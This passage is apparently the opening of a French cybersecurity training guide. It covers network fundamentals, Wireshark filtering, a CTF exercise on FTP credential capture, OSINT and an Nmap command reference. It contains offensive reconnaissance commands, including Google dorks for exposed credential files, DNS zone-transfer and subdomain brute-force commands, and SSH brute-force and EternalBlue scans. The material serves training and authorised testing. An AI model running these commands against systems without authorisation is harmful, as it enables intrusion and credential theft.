0% ont trouvé ce document utile (0 vote)
1 vues59 pages

Root Shell Exploit Payload

Transféré par

fulanyxerox77
Copyright
© All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd
0% ont trouvé ce document utile (0 vote)
1 vues59 pages

Root Shell Exploit Payload

Transféré par

fulanyxerox77
Copyright
© All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd

CYBERSECURITE - GUIDE COMPLET

CYBERSECURITE
Guide Complet — De Zero a Expert
[ Securite Reseau & Defense ]
[ Hacking Ethique & Pentest ]
[ Preparation aux CTF ]

10 Modules Progressifs | Theorie + Pratique + CTF | 100+ Commandes

01 Fondations du Reseau 02 Reconnaissance & OSINT

03 Securite des Protocoles 04 Analyse de Vulnerabilites

05 Exploitation & Post-Exploitation 06 Securite Web

07 Cryptographie Appliquee 08 Forensique & Reponse Incident

09 Hardening & Defense Active 10 Strategies CTF & Methodologie

AVERTISSEMENT LEGAL : Ce document est destine exclusivement a des fins educatives et pedagogiques. Toutes les techniques
presentees doivent etre pratiquees uniquement sur des systemes vous appartenant ou pour lesquels vous disposez d'une
autorisation ecrite explicite. Tout acces non autorise a un systeme informatique est un delit penal. L'auteur decline toute
responsabilite en cas d'utilisation malveillante de ces informations.

-1-
CYBERSECURITE - GUIDE COMPLET

TABLE DES MATIERES


01 Les Fondations du Reseau
■ 1.1 Modele OSI en 7 couches
■ 1.2 Modele TCP/IP operationnel
■ 1.3 TCP — flags, handshake, structure
■ 1.4 UDP — comparatif TCP
■ 1.5 ICMP — types et usage
■ 1.6 Ports et protocoles essentiels (23 entries)
■ 1.7 Adressage IPv4 et subnetting
■ 1.8 ARP — resolution d'adresses
■ 1.9 DNS — types d'enregistrements
■ 1.10 Wireshark — reference complete

02 Reconnaissance & OSINT


■ 2.1 Phases du pentest
■ 2.2 Reconnaissance passive — Google Dorks, WHOIS, DNS
■ 2.3 Nmap — tous les types de scans, NSE, outputs

03 Securite des Protocoles


■ 3.1 ARP Poisoning — attaque et contre-mesures
■ 3.2 DNS — attaques et enumeration
■ 3.3 SMB — EternalBlue, Responder, Pass-the-Hash
■ 3.4 SSL/TLS — configuration et tests

04 Analyse de Vulnerabilites
■ 4.1 CVE, CWE, CVSS v3.1
■ 4.2 Searchsploit et ExploitDB
■ 4.3 OpenVAS — installation et workflow
■ 4.4 Validation manuelle des resultats

05 Exploitation & Post-Exploitation


■ 5.1 Metasploit — architecture complete
■ 5.2 Meterpreter — reference complete
■ 5.3 Pivoting — 3 methodes (autoroute, SSH, Chisel)

06 Securite des Applications Web


■ 6.1 OWASP Top 10 2021
■ 6.2 SQL Injection — de la base a l'avance
■ 6.3 XSS — tous les types
■ 6.4 Burp Suite — guide complet, ffuf, gobuster

07 Cryptographie Appliquee
■ 7.1 Chiffrement symetrique — algorithmes et modes
■ 7.2 RSA, ECDSA, PKI, openssl
■ 7.3 Techniques CTF crypto

08 Forensique & Reponse a Incident


■ 8.1 Ordre de volatilite et acquisition
■ 8.2 Volatility 3 — reference complete
■ 8.3 Artefacts Windows forensiques
■ 8.4 Analyse logs et malware statique

-2-
CYBERSECURITE - GUIDE COMPLET

09 Hardening & Defense Active


■ 9.1 CIS Benchmarks Linux — Lynis, SSH, Fail2Ban
■ 9.2 iptables et nftables
■ 9.3 Suricata IDS/IPS — regles et detection

10 Strategies CTF & Methodologie Pentest


■ 10.1 Methodologie PTES complete
■ 10.2 Structure rapport pentest
■ 10.3 Strategies CTF par categorie
■ 10.4 Lab personnel + plateformes
■ 10.5 Certifications recommandees

-3-
CYBERSECURITE - GUIDE COMPLET

-4-
CYBERSECURITE - GUIDE COMPLET

MODULE 01

Les Fondations du Reseau


Avant d'attaquer ou de defendre un systeme, il faut comprendre parfaitement les rouages du reseau.
Ce module pose les bases indispensables : modeles de reference, protocoles essentiels, adressage
IP, et prise en main de Wireshark.

OBJECTIFS DU MODULE

✓ Maitriser le modele OSI (7 couches) et TCP/IP (4 couches)

✓ Comprendre l'encapsulation et la decapsulation des donnees

✓ Identifier les protocoles reseau critiques et leurs ports

✓ Comprendre le fonctionnement de TCP, UDP, ICMP en detail

✓ Maitriser l'adressage IPv4/IPv6 et le subnetting

✓ Utiliser Wireshark pour capturer et analyser le trafic en temps reel

✓ Appliquer les filtres Wireshark pour isoler les flux suspects

1.1 Le Modele OSI — Architecture en 7 Couches


Le modele OSI (Open Systems Interconnection), publie par l'ISO en 1984, est le cadre conceptuel universel qui
decrit comment deux systemes communiquent a travers un reseau. Chaque couche a un role precis et ne
communique qu'avec la couche immediatement superieure ou inferieure. En securite, identifier la couche
concernee par une attaque oriente immediatement la strategie de defense.

Couche Nom Protocoles / Exemples Attaques associees

7 Application HTTP/S, FTP, DNS, SMTP, SNMP, SSH Injection SQLi, XSS, MITM applicatif

6 Presentation TLS/SSL, JPEG, MIME, ASN.1 SSL Stripping, downgrade TLS

5 Session NetBIOS, RPC, SMB, NFS Session Hijacking, replay

4 Transport TCP, UDP, SCTP SYN Flood, Port Scan, hijacking

3 Reseau IP, ICMP, OSPF, BGP, ARP* IP Spoofing, ICMP Flood, routing

2 Liaison Ethernet, Wi-Fi 802.11, ARP, PPP ARP Spoofing, MAC Flooding

1 Physique RJ45, Fibre optique, Wi-Fi RF Wiretapping, jamming RF

Encapsulation — Comment les donnees voyagent

Lors de l'envoi, chaque couche AJOUTE un en-tete (et parfois un pied) : c'est l'encapsulation.

Couche 7 : Message (donnees brutes de l'application)

Couche 4 : Segment TCP/UDP = en-tete transport + message

-5-
CYBERSECURITE - GUIDE COMPLET

Couche 3 : Paquet IP = en-tete IP + segment

Couche 2 : Trame Ethernet = en-tete MAC + paquet IP + FCS

Couche 1 : Bits transmis sur le support physique

A la reception, chaque couche RETIRE son en-tete (decapsulation) jusqu'aux donnees originales.

1.2 Le Modele TCP/IP — Le Modele Operationnel


Le modele TCP/IP, developpe par DARPA dans les annees 1970, est le modele utilise par l'Internet et tous les
reseaux modernes. Il simplifie l'OSI en 4 couches fonctionnelles. C'est LE modele de reference pour
comprendre les attaques reelles.

Couche TCP/IP Equivalence OSI Protocoles cles PDU (unite de donnees)

Application 7+6+5 HTTP, DNS, FTP, SSH, SMTP, SNMP, DHCPMessage / Donnees

Transport 4 TCP (fiable), UDP (rapide) Segment (TCP) / Datagramme (UDP)

Internet 3 IP v4/v6, ICMP, IGMP, ARP Paquet

Acces reseau 2+1 Ethernet, Wi-Fi, PPP, Frame Relay Trame / Bits

1.3 Protocole TCP — Fiabilite et Controle de Flux


TCP (Transmission Control Protocol) garantit la livraison ordonnee et sans erreur des donnees. Il etablit une
connexion via le three-way handshake et la termine via un four-way teardown. Chaque segment TCP contient
des flags qui controlent l'etat de la connexion — la connaissance de ces flags est fondamentale pour
comprendre les scans Nmap et les attaques reseau.

Flags TCP et leur signification :


Flag Nom Usage normal Utilisation offensive

SYN Synchronize Initier une connexion SYN Scan (Nmap -sS), SYN Flood

ACK Acknowledge Accuser reception d'un segment ACK Scan pour detecter firewalls

FIN Finish Terminer la connexion proprement FIN Scan furtif (Nmap -sF)

RST Reset Interrompre une connexion abruptement RST injection pour couper sessions

PSH Push Forcer la transmission immediate Manipulation de buffers

URG Urgent Donnees urgentes en priorite Rarement utilise en attaque

ECE ECN-Echo Signalement congestion reseau Fingerprinting OS

CWR Congestion Window Reduced notification Fingerprinting OS

Three-Way Handshake et Four-Way Teardown :


# === THREE-WAY HANDSHAKE (etablissement connexion) ===

Client --[SYN, SEQ=1000]-----------> Serveur # Client initie

Client <-[SYN-ACK, SEQ=2000,ACK=1001]- Serveur # Serveur accepte + sync

-6-
CYBERSECURITE - GUIDE COMPLET

Client --[ACK, ACK=2001]------------> Serveur # Confirmation -> connexion etablie

# === TRANSFERT DE DONNEES ===

Client --[PSH-ACK, SEQ=1001, data]---> Serveur # Envoi donnees

Client <-[ACK=1001+len(data)]---------- Serveur # Accusé reception

# === FOUR-WAY TEARDOWN (fermeture connexion) ===

Client --[FIN-ACK]-----> Serveur # Client veut fermer

Client <-[ACK]----------- Serveur # Serveur accuse

Client <-[FIN-ACK]------- Serveur # Serveur veut fermer aussi

Client --[ACK]----------> Serveur # Client confirme -> connexion fermee

Structure d'un en-tete TCP (20 octets minimum) :


Champ Taille (bits) Description

Source Port 16 Port source (1-65535)

Destination Port 16 Port destination

Sequence Number 32 Numero de sequence du 1er octet de donnees

Acknowledgment Nb 32 Prochain octet attendu de l'autre cote

Data Offset 4 Taille de l'en-tete (x4 octets)

Reserved 3 Reserve pour usage futur

Flags 9 NS CWR ECE URG ACK PSH RST SYN FIN

Window Size 16 Fenetre de reception (controle de flux)

Checksum 16 Verification d'integrite de l'en-tete + donnees

Urgent Pointer 16 Si URG=1, pointe vers donnees urgentes

Options 0-320 MSS, SACK, Timestamps, Window Scaling

1.4 Protocole UDP — Rapidite sans Garantie


UDP (User Datagram Protocol) est un protocole sans connexion et sans garantie de livraison. Il sacrifie la
fiabilite au profit de la vitesse et de la faible latence. Utilise pour DNS, VoIP, jeux en ligne, streaming, et de
nombreux protocoles de gestion reseau. En pentest, les ports UDP sont souvent negliges mais peuvent cacher
des services critiques.

Aspect TCP UDP

Connexion Oui (3-way handshake) Non (connectionless)

Garantie livraison Oui (retransmission) Non

Ordre des paquets Garanti (SEQ numbers) Non garanti

Controle de flux Oui (window size) Non

En-tete 20+ octets 8 octets (leger)

-7-
CYBERSECURITE - GUIDE COMPLET

Vitesse Plus lent (overhead) Plus rapide

Usage HTTP, FTP, SSH, SMTP DNS, DHCP, VoIP, SNMP

Scan Nmap -sT (connect) ou -sS (SYN) -sU (scan UDP)

Ports UDP critiques a scanner

53 - DNS : transferts de zone, DNS tunneling possible

67 - DHCP : DHCP starvation, Rogue DHCP server

69 - TFTP : transfert de fichiers non authentifie

123 - NTP : amplification DDoS, NTP reflection

161 - SNMP v1/v2: community string en clair, information disclosure

500 - IKE : VPN IPSec, fingerprinting de configuration

1194 - OpenVPN : si mal configure, peut fuiter des infos

Commande : nmap -sU --top-ports 100 -T4

1.5 ICMP — Messages de Controle et Diagnostic


ICMP (Internet Control Message Protocol) est utilise pour diagnostiquer les problemes de connectivite reseau
(ping, traceroute) et transmettre des messages d'erreur. Bien qu'essentiel, ICMP est aussi un vecteur d'attaque
et de reconnaissance.

Type ICMP Code Signification Usage securite

0 0 Echo Reply (reponse ping) Decouverte d'hotes actifs

3 0-15 Destination Unreachable Cartographie reseau (firewall ACKs)

5 0-3 Redirect ICMP Redirect Attack (poisoning routage)

8 0 Echo Request (ping) Host discovery, ICMP Flood

11 0 Time Exceeded (TTL=0) Traceroute, mapping topologie

13 0 Timestamp Request Fingerprinting OS via timing

30 - Traceroute (obsolete) Utilise par certains outils

# Ping basique (envoyer 4 requetes ICMP Echo)

ping -c 4 [Link]

# Traceroute — cartographier le chemin reseau

traceroute [Link] # Linux (UDP par defaut)

traceroute -I [Link] # Linux avec ICMP

traceroute -T -p 80 [Link] # TCP traceroute (passe souvent les firewalls)

# Ping sweep — decouvrir les hotes actifs d'un subnet

fping -a -g [Link]/24 2>/dev/null

-8-
CYBERSECURITE - GUIDE COMPLET

# Nmap host discovery (sans scan de port)

nmap -sn [Link]/24 # Ping scan (ICMP + ARP)

nmap -sn -PE [Link]/24 # ICMP Echo uniquement

nmap -sn -PP [Link]/24 # ICMP Timestamp

1.6 Protocoles Essentiels et leurs Ports


Connaitre les ports associes a chaque protocole est fondamental : cela permet d'interpreter les resultats de
scan Nmap, de configurer des regles de firewall, et d'identifier immediatement les services exposes
potentiellement vulnerables.

Port(s) Protocole Description Risques / Remarques

20/21 FTP Transfert de fichiers Credentials en clair, anonymous login

22 SSH Shell securise, tunneling Brute force, cles faibles, CVEs

23 Telnet Shell non chiffre (obsolete) Capture triviale des credentials

25 SMTP Envoi d'emails Open relay, spam, phishing

53 DNS Resolution de noms Zone transfer, DNS tunneling

67/68 DHCP Attribution IP automatique Rogue DHCP, starvation

80 HTTP Web non chiffre Capture des donnees, injection

110 POP3 Reception emails (non chiffre) Credentials en clair

111 RPC Remote Procedure Call Enumeration, exploitation RPC

135 MSRPC RPC Windows Nombreuses CVEs historiques

137-139 NetBIOS Partage Windows legacy Enumeration, NTLM capture

143 IMAP Emails (non chiffre) Credentials en clair

161/162 SNMP Supervision reseau Community 'public', info disclosure

389 LDAP Annuaire (Active Directory) Enumeration utilisateurs AD

443 HTTPS Web chiffre TLS Mauvaise config TLS, cert invalide

445 SMB Partage fichiers Windows EternalBlue, Pass-the-Hash

1433 MSSQL Base de donnees Microsoft SQL SA par defaut, xp_cmdshell

3306 MySQL Base de donnees MySQL Root sans password, SQLi

3389 RDP Bureau a distance Windows BlueKeep, brute force, MITM

5985/86 WinRM Windows Remote Management Acces distant PS, pivoting

6379 Redis Base NoSQL en memoire Acces sans auth frequent

8080 HTTP-alt Proxy, applis web alternatives Memes risques qu'HTTP

27017 MongoDB Base NoSQL Acces sans auth frequent

-9-
CYBERSECURITE - GUIDE COMPLET

1.7 Adressage IPv4 et Subnetting


Une adresse IPv4 est composee de 32 bits (4 octets) en notation pointee decimale. Le subnetting divise un
reseau en sous-reseaux pour optimiser l'adressage et segmenter le trafic. En pentest, comprendre le subnetting
permet d'identifier la portee exacte d'une cible et de planner les pivots reseau.

Classe 1er octet Plage d'adresses Masque par defaut Nb d'hotes

A 1-126 [Link] - [Link] /8 ([Link]) 16 777 214

B 128-191 [Link] - [Link] /16 ([Link]) 65 534

C 192-223 [Link] - [Link] /24 ([Link]) 254

D 224-239 [Link] - [Link] Multicast N/A

E 240-255 [Link] - [Link] Experimental N/A

Plages d'adresses privees (RFC 1918) :


Plage prive Notation CIDR Usage typique

[Link] - [Link] /8 Grands reseaux d'entreprise

[Link] - [Link] /12 Moyennes entreprises

[Link] - [Link] /16 Reseaux domestiques, PME

[Link] - [Link] /8 Loopback (communication locale)

[Link] - [Link] /16 APIPA (DHCP echoue)

Calcul de sous-reseau — Exemples pratiques :


# Calculer les infos d'un sous-reseau avec ipcalc

ipcalc [Link]/24

Network: [Link]/24

Broadcast: [Link]

HostMin: [Link]

HostMax: [Link]

Hosts/Net: 254

ipcalc [Link]/22

Network: [Link]/22

Broadcast: [Link]

HostMin: [Link]

HostMax: [Link]

Hosts/Net: 1022

# Table de reference rapide CIDR

/24 = 254 hotes /25 = 126 /26 = 62 /27 = 30

/28 = 14 hotes /29 = 6 /30 = 2 /32 = 1 hote (host route)

- 10 -
CYBERSECURITE - GUIDE COMPLET

# Convertir IP en binaire (Python)

python3 -c "import ipaddress; print(bin(int(ipaddress.IPv4Address('[Link]'))))"

1.8 ARP — Resolution d'Adresses MAC


ARP (Address Resolution Protocol) traduit une adresse IP en adresse MAC sur un reseau local. Sans
mecanisme d'authentification, il est naturellement vulnerable au poisoning. C'est la base de nombreuses
attaques MITM sur LAN.

# Afficher la table ARP locale

arp -n # Linux

arp -a # Windows

ip neigh show # Linux moderne

# Envoyer une requete ARP manuellement (arping)

arping -I eth0 [Link]

arping -c 3 -I eth0 [Link]

# Nmap ARP discovery (le plus rapide sur LAN)

nmap -sn -PR [Link]/24 # -PR = ARP Ping

nmap -sn --send-ip [Link]/24 # Forcer IP (pas ARP) pour bypasser

# Verifier si une IP repond en ARP (detection hote)

arp-scan --interface=eth0 [Link]/24

arp-scan -l # Scanner tout le reseau local

1.9 DNS — Anatomie du Systeme de Noms


Le DNS (Domain Name System) est l'annuaire de l'Internet. Il traduit les noms de domaine en adresses IP. Sa
hierarchie distribuee et l'absence d'authentification native (avant DNSSEC) en font un protocole critique a
maitriser.

Type d'enregistrement
Description Exemple

A Adresse IPv4 du domaine [Link] -> [Link]

AAAA Adresse IPv6 du domaine [Link] -> 2606:2800::1

CNAME Alias vers un autre nom www -> [Link]

MX Serveur de messagerie 10 [Link]

NS Serveur de noms autoritaire [Link]

TXT Texte libre (SPF, DKIM, verification) v=spf1 include:... -all

PTR Reverse DNS (IP -> nom) [Link].[Link]

SOA Start of Authority (meta-zone) Numero de serie, TTL...

SRV Service locator _ldap._tcp.[Link]

CAA Autorites de certification autorisees 0 issue '[Link]'

- 11 -
CYBERSECURITE - GUIDE COMPLET

# Requetes DNS avec dig — l'outil de reference

dig [Link] A # Enregistrement A (IPv4)

dig [Link] AAAA # Enregistrement AAAA (IPv6)

dig [Link] MX # Serveurs mail

dig [Link] NS # Serveurs DNS

dig [Link] TXT # Enregistrements TXT (SPF, DKIM...)

dig [Link] ANY # Tous les types (souvent bloque)

# Requete vers un serveur DNS specifique

dig @[Link] [Link] A # Utiliser Google DNS

dig @[Link] [Link] A # Utiliser Cloudflare DNS

# Reverse DNS (IP vers nom)

dig -x [Link]

host [Link]

# Test de Zone Transfer AXFR (si mal configure = vuln critique)

dig axfr @[Link] [Link]

host -l [Link] [Link]

# Traces DNS complet (debug)

dig +trace [Link]

# Verifier DNSSEC

dig +dnssec [Link] # Chercher les flags AD, DO

delv @[Link] +rtrace [Link]

1.10 Wireshark — Analyse de Protocoles en Profondeur


Wireshark est l'analyseur de protocoles reseau de reference. Il capture les paquets en temps reel sur les
interfaces reseau et permet de dissequer chaque couche du modele OSI. Indispensable pour le debug reseau,
l'analyse forensique et la comprehension des attaques.

Installation et premiere capture :


# Installation

sudo apt install wireshark tshark -y

sudo usermod -aG wireshark $USER # Permettre la capture sans root

# Lister les interfaces disponibles

wireshark -D

tshark -D

ip link show

# Lancer une capture sur eth0

- 12 -
CYBERSECURITE - GUIDE COMPLET

sudo wireshark -i eth0 & # Interface graphique

sudo tshark -i eth0 # Ligne de commande

# Capturer et sauvegarder dans un fichier pcap

sudo tshark -i eth0 -w [Link]

sudo tcpdump -i eth0 -w [Link]

# Lire un fichier pcap existant

wireshark [Link]

tshark -r [Link]

Filtres de capture (Berkeley Packet Filter - BPF) :


Les filtres BPF s'appliquent AVANT la capture (niveau kernel) — ils reduisent le volume de donnees collectees.
A distinguer des filtres d'affichage Wireshark appliques APRES.

# Filtres BPF (capture) — syntaxe tcpdump/Wireshark

sudo tshark -i eth0 -f 'host [Link]'

sudo tshark -i eth0 -f 'port 80'

sudo tshark -i eth0 -f 'tcp port 443'

sudo tshark -i eth0 -f 'not arp and not icmp'

sudo tshark -i eth0 -f 'net [Link]/24'

sudo tshark -i eth0 -f 'port 80 or port 443'

sudo tshark -i eth0 -f 'tcp[tcpflags] & tcp-syn != 0' # SYN uniquement

sudo tshark -i eth0 -f 'icmp[icmptype] == 8' # ICMP Echo Request

Filtres d'affichage Wireshark (les plus utiles) :


Filtre d'affichage Ce qu'il isole

tcp Tout le trafic TCP

udp Tout le trafic UDP

icmp Tous les paquets ICMP

dns Requetes et reponses DNS

http Trafic HTTP (port 80)

tls / ssl Trafic TLS/SSL (HTTPS, etc.)

[Link] == [Link] Tout trafic vers OU depuis cette IP

[Link] == [Link] Paquets envoyes par cette IP seulement

[Link] == [Link] Paquets a destination de cette IP

[Link] == 8080 Trafic TCP sur le port 8080

[Link] == 443 Connexions HTTPS sortantes

[Link] == 1 && [Link] == 0 SYN seuls (nouvelles connexions)

- 13 -
CYBERSECURITE - GUIDE COMPLET

[Link] == 1 Paquets RST (connexions interrompues)

[Link] == "POST" Formulaires soumis (credentials !)

[Link] == 200 Reponses HTTP OK

[Link] >= 400 Erreurs HTTP (400, 404, 500...)

[Link] == "PASS" Mots de passe FTP en clair

[Link] Auth SMTP (credentials)

[Link] contains "google" Requetes DNS contenant 'google'

[Link] > 1400 Paquets proches de la MTU (1500 oct)

!(arp or icmp or dns) Exclure le bruit (ARP, ping, DNS)

[Link] < 5 TTL faible = probablement un traceroute

tcp contains "password" Mot 'password' dans le payload TCP

Fonctionnalites avancees de Wireshark :


# === SUIVRE UN FLUX COMPLET ===

# Clic droit sur un paquet -> Follow -> TCP Stream

# Affiche la conversation complete en clair

# === STATISTIQUES ===

# Statistics -> Conversations : tous les flux actifs

# Statistics -> Protocol Hierarchy : repartition des protocoles

# Statistics -> IO Graphs : debit dans le temps

# Statistics -> Endpoints : tous les hotes detectes

# === EXPORTER DES OBJETS (fichiers transfères) ===

# File -> Export Objects -> HTTP (recuperer fichiers HTTP)

# File -> Export Objects -> FTP-DATA

# File -> Export Objects -> SMB

# === DECHIFFRER TLS (si on a la cle privee ou SSLKEYLOGFILE) ===

# Edit -> Preferences -> Protocols -> TLS

# Ajouter la cle privee RSA du serveur (format PEM)

# OU pointer vers SSLKEYLOGFILE (variable d'env Firefox/Chrome)

export SSLKEYLOGFILE=~/ssl_keys.log

firefox & # Les cles de session sont loggees automatiquement

# === TSHARK EN LIGNE DE COMMANDE ===

tshark -r [Link] -T fields -e [Link] -e [Link] -e [Link]

tshark -r [Link] -Y '[Link] == "POST"' -V

tshark -r [Link] -qz io,phs # Hierarchie des protocoles

- 14 -
CYBERSECURITE - GUIDE COMPLET

tshark -r [Link] -qz conv,tcp # Conversations TCP

Raccourcis Wireshark indispensables

Ctrl+F : Rechercher dans les paquets

Ctrl+G : Aller a un numero de paquet specifique

Ctrl+E : Exporter les objets HTTP/FTP/SMB

Ctrl+Shift+E : Exporter des paquets selectionnes

Ctrl+Alt+Shift+T : Suivre le flux TCP

Colorer regles -> View -> Coloring Rules (personnaliser la colorisation)

Mark packet : Ctrl+M (pour marquer des paquets importants)

CTF #01 - Le Paquet Mystérieux


Scenario

Un administrateur systeme vous contacte : des donnees sensibles semblent avoir ete exfiltrees depuis le
serveur FTP de son entreprise. Il vous fournit un fichier '[Link]' enregistre pendant l'incident. Votre
mission : analyser le trafic, identifier le protocole d'exfiltration, retrouver les credentials utilises et extraire le
fichier transmis.

Objectifs

[1] Ouvrir le fichier [Link] avec Wireshark

[2] Identifier les protocoles presents (Statistics -> Protocol Hierarchy)

[3] Filtrer le trafic FTP et suivre le flux de controle (port 21)

[4] Extraire les credentials FTP (USER et PASS en clair)

[5] Exporter le fichier transfere via File -> Export Objects -> FTP-DATA

[6] Lire le contenu du fichier pour trouver le flag

Outils suggeres

Wireshark (interface graphique)

tshark -r [Link] -Y ftp -T fields -e [Link] -e [Link]

tshark -r [Link] -Y ftp-data

Indice

Utilisez le filtre 'ftp' pour voir les commandes, puis 'ftp-data' pour les donnees. Export Objects -> FTP-DATA
extrait automatiquement les fichiers.

Format du flag

CTF{ftp_cr3d3nt14ls_4nd_d4t4_3xf1ltr4t1on_d3t3ct3d}

- 15 -
CYBERSECURITE - GUIDE COMPLET

MODULE 02

Reconnaissance & OSINT


La reconnaissance est la phase la plus critique d'un pentest. Plus l'information collectee est precise,
plus les phases suivantes seront efficaces. Ce module couvre toutes les techniques passives et
actives pour cartographier une cible.

OBJECTIFS DU MODULE

✓ Distinguer reconnaissance passive (OSINT) et active (interaction directe)

✓ Maitriser les Google Dorks pour extraire des informations publiques

✓ Utiliser Nmap avec toutes ses options pour cartographier un reseau

✓ Enumerer les sous-domaines et la surface d'attaque DNS

✓ Exploiter Shodan, Censys et TheHarvester

✓ Comprendre le footprinting d'une organisation cible

2.1 Phases du Pentest — Vue d'Ensemble


Phase Nom Description Outils cles

1 Pre-engagement Contrat, scope, RoE, autorisation legale Documents, templates

2 Reconnaissance Collecte d'infos passive et active OSINT, Nmap, Shodan

3 Enumeration Services, versions, users, shares Nmap -sV, enum4linux

4 Analyse de vuln. Identification et priorisation des failles Nessus, OpenVAS

5 Exploitation Compromission des systemes cibles Metasploit, Exploits

6 Post-exploitation Pivot, persistence, exfiltration Meterpreter, Empire

7 Rapport Documentation complete des findings Dradis, PlexTrac

2.2 Reconnaissance Passive — OSINT


La reconnaissance passive ne genere aucune interaction directe avec la cible. Elle exploite exclusivement les
sources d'information publiquement disponibles. Legale dans la quasi-totalite des cas, elle peut fournir des
informations extremement sensibles sur l'organisation cible.

Google Dorking — Operateurs avances :


Operateur Syntaxe Exemple d'usage

site: site:[Link] Limiter la recherche a un domaine

filetype: filetype:pdf site:[Link] Fichiers PDF publics sur le domaine

- 16 -
CYBERSECURITE - GUIDE COMPLET

inurl: inurl:admin site:[Link] Pages dont l'URL contient 'admin'

intext: intext:"mot de passe" site:... Pages contenant ce texte

intitle: intitle:"index of" /backup Titre de page specific

cache: cache:[Link] Version en cache de Google

link: link:[Link] Pages qui pointent vers ce domaine

"..." "phrase exacte" Recherche de phrase exacte

-mot -login site:[Link] Exclure les pages contenant ce mot

OR site:[Link] OR site:[Link] Plusieurs domaines

# === GOOGLE DORKS PENTEST ESSENTIELS ===

# Fichiers de configuration et credentials exposes

site:[Link] filetype:env

site:[Link] filetype:cfg OR filetype:conf OR filetype:ini

site:[Link] filetype:xml intext:password

site:[Link] "DB_PASSWORD" OR "database_password"

# Repertoires indexés (directory listing)

intitle:"index of" site:[Link]

intitle:"index of" /backup site:[Link]

intitle:"index of" site:[Link] "parent directory"

# Panneaux d'administration

site:[Link] inurl:admin OR inurl:administrator OR inurl:login

site:[Link] inurl:phpmyadmin OR inurl:wp-admin OR inurl:cpanel

# Fichiers sensibles

site:[Link] filetype:sql

site:[Link] filetype:log

site:[Link] filetype:bak OR filetype:backup OR filetype:old

# Cameras et appareils IoT (Shodan est mieux pour ca)

inurl:"/view/[Link]"

intitle:"webcamXP 5" inurl:8080

# Endpoints API exposes

site:[Link] inurl:api

site:[Link] inurl:swagger OR inurl:api-docs

Enumeration DNS — Cartographie de la surface d'attaque :


# Enumeration DNS passive avec fierce

fierce --domain [Link]

- 17 -
CYBERSECURITE - GUIDE COMPLET

# Enumeration de sous-domaines avec amass (OSINT)

amass enum -passive -d [Link]

amass enum -active -d [Link] -brute

# Subfinder — enumeration rapide via sources OSINT

subfinder -d [Link] -silent

subfinder -d [Link] -o [Link]

# Brute force de sous-domaines avec gobuster

gobuster dns -d [Link] -w


/usr/share/wordlists/seclists/Discovery/DNS/[Link]

# Test de Zone Transfer (AXFR) - critique si non protege

dig axfr @[Link] [Link]

dnsrecon -d [Link] -t axfr

# Enumeration complete avec dnsrecon

dnsrecon -d [Link] -t std # Enregistrements standards

dnsrecon -d [Link] -t brt # Brute force sous-domaines

dnsrecon -d [Link] -t goo # Recherche Google

# theHarvester — emails, sous-domaines, IPs, URLs

theHarvester -d [Link] -l 500 -b all

theHarvester -d [Link] -b google,bing,linkedin,shodan

WHOIS et informations d'enregistrement :


# WHOIS d'un domaine

whois [Link]

whois -h [Link] [Link]

# Informations extraites : Registrant name/org/email, dates

# creation/expiration, serveurs DNS, registrar

# Reverse WHOIS — tous les domaines du meme registrant

# Utiliser [Link] ou [Link]

# ASN lookup — identifier les blocs IP d'une organisation

whois -h [Link] -- '-i origin AS15169' # Google

curl -s [Link] | jq .prefixes

# Shodan — appareils connectes indexes

shodan search 'org:"Target Company" port:22'

shodan search '[Link]:[Link]'

shodan host [Link]

# Censys — alternative a Shodan

- 18 -
CYBERSECURITE - GUIDE COMPLET

curl '[Link]

2.3 Nmap — Reference Complète


Nmap (Network Mapper) est l'outil de scan reseau le plus utilise en securite offensive et defensive. Sa
puissance vient de la combinaison de techniques de scan variees, de la detection de services et d'OS, et du
Nmap Scripting Engine (NSE).

Types de scans et leurs caracteristiques :


Option Nmap Nom du scan Fonctionnement Privilege requis

-sT TCP Connect Connexion TCP complete (3-way HS) Utilisateur

-sS SYN Stealth Envoie SYN, attend SYN-ACK, envoie RST Root/Admin

-sU UDP Scan Envoie paquet UDP vide, analyse reponse Root/Admin

-sF FIN Scan Envoie FIN, port ferme -> RST, ouvert -> rien Root/Admin

-sX Xmas Scan Flags FIN+PSH+URG allumes (comme sapin Noel)


Root/Admin

-sN Null Scan Aucun flag - meme principe que FIN Root/Admin

-sA ACK Scan Detecte firewalls et regles de filtrage Root/Admin

-sW Window Scan Variante ACK, analyse TCP window size Root/Admin

-sI Idle/Zombie Scan Utilise un hote tiers comme relais Root/Admin

-sO IP Protocol Scan Detecte protocoles IP supportes (IP, TCP, UDP) Root/Admin

# === SCAN DE BASE — DECOUVERTE ===

nmap [Link]/24 # Scan ping + ports courants

nmap -sn [Link]/24 # Decouverte hotes uniquement (ping scan)

nmap -Pn [Link] # Ne pas pinger (bypass firewall ICMP)

# === SCAN DE PORTS ===

nmap -p 80,443,8080 [Link] # Ports specifiques

nmap -p- [Link] # TOUS les ports (1-65535)

nmap -p 1-1024 [Link] # Plage de ports

nmap --top-ports 1000 [Link] # Top 1000 ports les plus courants

nmap --top-ports 100 -sU [Link] # Top 100 UDP

# === DETECTION DE SERVICES ET OS ===

nmap -sV [Link] # Detection des versions de services

nmap -sV --version-intensity 9 [Link] # Detection maximale

nmap -O [Link] # Detection OS (necessite root)

nmap -A [Link] # Tout : OS + version + scripts + traceroute

# === TIMING (T0 = lent/furtif -> T5 = ultra rapide) ===

nmap -T0 [Link] # Paranoiaque (IDS evasion)

- 19 -
CYBERSECURITE - GUIDE COMPLET

nmap -T1 [Link] # Furtif

nmap -T2 [Link] # Poli

nmap -T3 [Link] # Normal (defaut)

nmap -T4 [Link] # Agressif (recommande en lab)

nmap -T5 [Link] # Insane (risque de rater des ports)

# === NMAP SCRIPTING ENGINE (NSE) ===

nmap -sC [Link] # Scripts par defaut

nmap --script=default [Link] # Equivalent -sC

nmap --script vuln [Link] # Scanner les vulnerabilites

nmap --script smb-vuln-ms17-010 -p 445 [Link] # EternalBlue

nmap --script http-enum -p 80,443 [Link] # Enum web

nmap --script ftp-anon -p 21 [Link] # FTP anonyme

nmap --script ssh-brute -p 22 [Link] # Brute SSH

nmap --script dns-brute --script-args [Link]=[Link]

